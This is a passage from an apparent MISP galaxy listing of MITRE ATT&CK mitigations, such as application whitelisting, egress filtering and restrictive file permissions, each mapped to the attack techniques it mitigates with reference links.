mitigates: misp-galaxy:mitre-attack-pattern="Container Administration Command - T1609" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Deploy Container - T1610" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Build Image on Host - T1612" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Container API - T1552.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Container and Resource Discovery - T1613" with estimative-language:likelihood-probability="almost-certain"

Table 4058. Table References
Links
https://attack.mitre.org/mitigations/M1035

Data from Network Shared Drive Mitigation - T1039

Identify unnecessary system utilities or potentially malicious software that may be used to collect data from a network share, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data from Network Shared Drive Mitigation - T1039"

View relationships graph

Data from Network Shared Drive Mitigation - T1039 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"

Table 4059. Table References
Links
https://attack.mitre.org/mitigations/T1039
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Windows Management Instrumentation Event Subscription Mitigation - T1084

Disabling WMI services may cause system instability and should be evaluated to assess the impact to a network. By default, only administrators are allowed to connect remotely using WMI; restrict other users that are allowed to connect, or disallow all users from connecting remotely to WMI. Prevent credential overlap across systems of administrator and privileged accounts. (Citation: FireEye WMI 2015)

The tag is: misp-galaxy:mitre-course-of-action="Windows Management Instrumentation Event Subscription Mitigation - T1084"

View relationships graph

Windows Management Instrumentation Event Subscription Mitigation - T1084 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1084" with estimative-language:likelihood-probability="almost-certain"

Table 4060. Table References
Links
https://attack.mitre.org/mitigations/T1084
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf

Custom Command and Control Protocol Mitigation - T1094

Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Custom Command and Control Protocol Mitigation - T1094"

View relationships graph

Custom Command and Control Protocol Mitigation - T1094 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"

Table 4061. Table References
Links
https://attack.mitre.org/mitigations/T1094
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Image File Execution Options Injection Mitigation - T1183

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all IFEO will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. (Citation: Microsoft IFEOorMalware July 2015) Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Identify and block potentially malicious software that may be executed through IFEO by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown executables.

The tag is: misp-galaxy:mitre-course-of-action="Image File Execution Options Injection Mitigation - T1183"

View relationships graph

Image File Execution Options Injection Mitigation - T1183 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1183" with estimative-language:likelihood-probability="almost-certain"

Table 4062. Table References
Links
https://attack.mitre.org/mitigations/T1183
https://answers.microsoft.com/windows/forum/windows_10-security/part-of-windows-10-or-really-malware/af715663-a34a-423c-850d-2a46f369a54c
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

SIP and Trust Provider Hijacking Mitigation - T1198

Ensure proper permissions are set for Registry hives to prevent users from modifying keys related to SIP and trust provider components. Also ensure that these values contain their full path to prevent [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). (Citation: SpectorOps Subverting Trust Sept 2017)

Consider removing unnecessary and/or stale SIPs. (Citation: SpectorOps Subverting Trust Sept 2017)

Restrict storage and execution of SIP DLLs to protected directories, such as C:\Windows, rather than user directories.

Enable whitelisting solutions such as AppLocker and/or Device Guard to block the loading of malicious SIP DLLs. Components may still be able to be hijacked to suitable functions already present on disk if malicious modifications to Registry keys are not prevented.

The tag is: misp-galaxy:mitre-course-of-action="SIP and Trust Provider Hijacking Mitigation - T1198"

View relationships graph

SIP and Trust Provider Hijacking Mitigation - T1198 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1198" with estimative-language:likelihood-probability="almost-certain"

Table 4063. Table References
Links
https://attack.mitre.org/mitigations/T1198
https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf

Standard Non-Application Layer Protocol Mitigation - T1095

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Standard Non-Application Layer Protocol Mitigation - T1095"

View relationships graph

Standard Non-Application Layer Protocol Mitigation - T1095 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

Table 4064. Table References
Links
https://attack.mitre.org/mitigations/T1095
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Deobfuscate/Decode Files or Information Mitigation - T1140

Identify unnecessary system utilities or potentially malicious software that may be used to deobfuscate or decode files or information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Deobfuscate/Decode Files or Information Mitigation - T1140"

View relationships graph

Deobfuscate/Decode Files or Information Mitigation - T1140 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 4065. Table References
Links
https://attack.mitre.org/mitigations/T1140
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Deploy Compromised Device Detection Method - M1010

A variety of methods exist that can be used to enable enterprises to identify compromised (e.g. rooted/jailbroken) devices, whether using security mechanisms built directly into the device, third-party mobile security applications, enterprise mobility management (EMM)/mobile device management (MDM) capabilities, or other methods. Some methods may be trivial to evade while others may be more sophisticated.

The tag is: misp-galaxy:mitre-course-of-action="Deploy Compromised Device Detection Method - M1010"

View relationships graph

Deploy Compromised Device Detection Method - M1010 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Keychain - T1579" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Command-Line Interface - T1605" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hooking - T1617" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="User Evasion - T1618" with estimative-language:likelihood-probability="almost-certain"

Table 4066. Table References
Links
https://attack.mitre.org/mitigations/M1010

Data Transfer Size Limits Mitigation - T1030

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Data Transfer Size Limits Mitigation - T1030"

View relationships graph

Data Transfer Size Limits Mitigation - T1030 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"

Table 4067. Table References
Links
https://attack.mitre.org/mitigations/T1030
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Data from Local System Mitigation - T1005

Identify unnecessary system utilities or potentially malicious software that may be used to collect data from the local system, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data from Local System Mitigation - T1005"

View relationships graph

Data from Local System Mitigation - T1005 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 4068. Table References
Links
https://attack.mitre.org/mitigations/T1005
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

File System Logical Offsets Mitigation - T1006

Identify potentially malicious software that may be used to access logical drives in this manner, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="File System Logical Offsets Mitigation - T1006"

View relationships graph

File System Logical Offsets Mitigation - T1006 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Direct Volume Access - T1006" with estimative-language:likelihood-probability="almost-certain"

Table 4069. Table References
Links
https://attack.mitre.org/mitigations/T1006
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Caution with Device Administrator Access - M1007

Warn device users not to accept requests to grant Device Administrator access to applications without good reason.

Additionally, application vetting should include a check on whether the application requests Device Administrator access. Applications that do request Device Administrator access should be carefully scrutinized and only allowed to be used if a valid reason exists.

The tag is: misp-galaxy:mitre-course-of-action="Caution with Device Administrator Access - M1007"

View relationships graph

Caution with Device Administrator Access - M1007 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"

Table 4070. Table References
Links
https://attack.mitre.org/mitigations/M1007

Indicator Removal on Host Mitigation - T1070

Automatically forward events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system. Protect generated event files that are stored locally with proper permissions and authentication and limit opportunities for adversaries to increase privileges by preventing Privilege Escalation opportunities. Obfuscate/encrypt event files locally and in transit to avoid giving feedback to an adversary.

The tag is: misp-galaxy:mitre-course-of-action="Indicator Removal on Host Mitigation - T1070"

View relationships graph

Indicator Removal on Host Mitigation - T1070 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002" with estimative-language:likelihood-probability="almost-certain"

Table 4071. Table References
Links
https://attack.mitre.org/mitigations/T1070

Exploitation of Remote Services Mitigation - T1210

Segment networks and systems appropriately to reduce access to critical systems and services to controlled methods. Minimize available services to only those that are necessary. Regularly scan the internal network for available services to identify new and potentially vulnerable services. Minimize permissions and access for service accounts to limit impact of exploitation.

Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for all software or services targeted.

The tag is: misp-galaxy:mitre-course-of-action="Exploitation of Remote Services Mitigation - T1210"

View relationships graph

Exploitation of Remote Services Mitigation - T1210 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 4072. Table References
Links
https://attack.mitre.org/mitigations/T1210
https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/
https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/
https://en.wikipedia.org/wiki/Control-flow_integrity

System Network Configuration Discovery Mitigation - T1016

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about a system’s network configuration, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Network Configuration Discovery Mitigation - T1016"

View relationships graph

System Network Configuration Discovery Mitigation - T1016 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 4073. Table References
Links
https://attack.mitre.org/mitigations/T1016
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Replication Through Removable Media Mitigation - T1091

Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if it is not required for business operations. (Citation: TechNet Removable Media Control)

Identify potentially malicious software that may be used to infect removable media or may result from tainted removable media, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Replication Through Removable Media Mitigation - T1091"

View relationships graph

Replication Through Removable Media Mitigation - T1091 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"

Table 4074. Table References
Links
https://attack.mitre.org/mitigations/T1091
https://support.microsoft.com/en-us/kb/967715
https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Restrict File and Directory Permissions - M1022

Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.

The tag is: misp-galaxy:mitre-course-of-action="Restrict File and Directory Permissions - M1022"

View relationships graph

Restrict File and Directory Permissions - M1022 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Malicious Shell Modification - T1156" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Clear Command History - T1146" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Control Panel Items - T1196" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1504" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1157" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1073" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1494" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Systemd Service - T1501" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Sudo - T1169" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Startup Items - T1165" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1184" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1198" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Shared Webroot - T1051" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Time Providers - T1209" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1037" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disabling Security Tools - T1089" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1145" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Plist Modification - T1150" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Path Interception - T1034" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1096" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1054" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1492" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Service Execution - T1035" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="XDG Autostart Entries - T1547.013" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data from Cloud Storage Object - T1530" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Logon Script (Mac) - T1037.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Logon Script - T1037.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Startup Items - T1037.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Control Panel - T1218.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Unix Shell Configuration Modification - T1546.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1546.013" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Time Providers - T1547.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Plist Modification - T1547.011" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="File and Directory Permissions Modification - T1222" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1553.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Proc Memory - T1055.009" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1563.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1565.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="System Services - T1569" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Path Interception by Unquoted Path - T1574.009" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Path Interception by PATH Environment Variable - T1574.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Path Interception by Search Order Hijacking - T1574.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1574.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="RC Scripts - T1037.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SSH Authorized Keys - T1098.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Systemd Timers - T1053.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

Table 4075. Table References
Links
https://attack.mitre.org/mitigations/M1022

Exploitation for Client Execution Mitigation - T1203

Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist. (Citation: Windows Blogs Microsoft Edge Sandbox) (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Other types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

The tag is: misp-galaxy:mitre-course-of-action="Exploitation for Client Execution Mitigation - T1203"

View relationships graph

Exploitation for Client Execution Mitigation - T1203 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

Table 4076. Table References
Links
https://attack.mitre.org/mitigations/T1203
https://blogs.windows.com/msedgedev/2017/03/23/strengthening-microsoft-edge-sandbox/
https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/
https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/
https://en.wikipedia.org/wiki/Control-flow_integrity

Change Default File Association Mitigation - T1042

Direct mitigation of this technique is not recommended since it is a legitimate function that can be performed by users for software preferences. Follow Microsoft’s best practices for file associations. (Citation: MSDN File Associations)

Identify and block potentially malicious software that may be executed by this technique using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Change Default File Association Mitigation - T1042"

View relationships graph

Change Default File Association Mitigation - T1042 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1042" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1546.001" with estimative-language:likelihood-probability="almost-certain"

Table 4077. Table References
Links
https://attack.mitre.org/mitigations/T1042
https://msdn.microsoft.com/en-us/library/cc144156.aspx
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Data from Removable Media Mitigation - T1025

Identify unnecessary system utilities or potentially malicious software that may be used to collect data from removable media, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

